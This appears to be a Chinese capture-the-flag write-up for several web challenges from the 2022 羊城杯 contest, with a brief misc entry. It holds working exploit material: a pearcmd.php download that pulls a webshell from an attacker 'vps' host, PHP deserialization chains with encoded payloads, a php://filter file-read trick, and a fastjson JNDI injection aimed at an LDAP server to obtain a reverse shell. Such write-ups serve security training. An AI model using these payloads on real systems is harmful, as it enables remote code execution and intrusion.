羊城杯2022 部分web
WEB
rce_me
<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
$blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
foreach($blacklist as $blackword){
if(stristr($var, $blackword)) return False;
}
return True;
}
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
}
pearcmd.php文件包含,过滤了常用的几个命令选项,但还有个download。写个马丢到vps上,pear的过滤使用url编码绕过。
/?+download+http://vps:7999/asd.php+&file=/usr/local/lib/php/%70%65%61%72%63%6d%64.php
date -f /flag
step_by_step-v3
本来想着bypass 那个正则的 结果发现flag在phpinfo里面
$a = new cheng();
$b = new bei();
$c = new yang();
$d = new cheng();
$e = new yang();
$d->c1 = $e;
$c->y1 = $d;
$b->b1 = $c;
$a->c1 = $b;
echo (serialize($a));
ans=O%3A5%3A%22cheng%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A3%3A%22bei%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A4%3A%22yang%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A5%3A%22cheng%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22yang%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BN%3B%7D%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D
?file=php://filter/read=convert.base64-encode//resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/hint.php
读phpinfo的链子,就上面文件包含前一段
$a=new cheng();
$b=new bei();
$c=new yang();
$c->y1="phpinfo";
$a->c1=$b;
$b->b1=$c;
echo serialize($a);
Safepop
去年浙江省大学生省赛原题
Pop链思路为class B -> class A::__get -> class Fun::__call -> class Test::getFlag
Exp:
<?php
class Fun{
private $func;
public function __construct(){
$this->func = [new Test,'getFlag'];
}
}
class Test{
public function getFlag(){
//system("cat /flag?");
}
}
class A{
public $a;
}
class B{
public $p;
}
$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;
$b->p = "c";
echo base64_encode(serialize($b));
为了防止私有属性不可见字符在复制中消失,选择生成base64 再在burp中修改对象属性个数,并urlencode保留不可见字符
Payload:
/?pop=%4f%3a%31%3a%22%42%22%3a%32%3a%7b%73%3a%31%3a%22%70%22%3b%73%3a%31%3a%22%63%22%3b%73%3a%31%3a%22%61%22%3b%4f%3a%31%3a%22%41%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%46%75%6e%22%3a%32%3a%7b%73%3a%39%3a%22%00%46%75%6e%00%66%75%6e%63%22%3b%61%3a%32%3a%7b%69%3a%30%3b%4f%3a%34%3a%22%54%65%73%74%22%3a%30%3a%7b%7d%69%3a%31%3b%73%3a%37%3a%22%67%65%74%46%6c%61%67%22%3b%7d%7d%7d%7d
simple_json(复现)
jar包解压反编译看到test那有个测试用例,就是jndi注入了。是用的fastjson去实例化题目自己写的JNDIService类触发。
自己用org.apache.naming.factory.BeanFactory 类打没打成功,没搞明白为啥。使用JNDIInject-1.2-SNAPSHOT.jar这个工具去打高版本利用,用fuzz模块去看看可用的利用链。
{
"content": {
"@type": "ycb.simple_json.service.JNDIService",
"target": "ldap://vps:7999/fuzzbyDNS/w8wlk1.dnslog.cn"
},
"msg": {
"$ref": "$.content.context"
}
}
用工具给的对应payload源码修改一下命令 生成jar包 然后反弹shell即可
ldap://ip:7999/snakeyaml/http://ip:7777/yaml-payload.jar
MISC
签到
rot13+base32
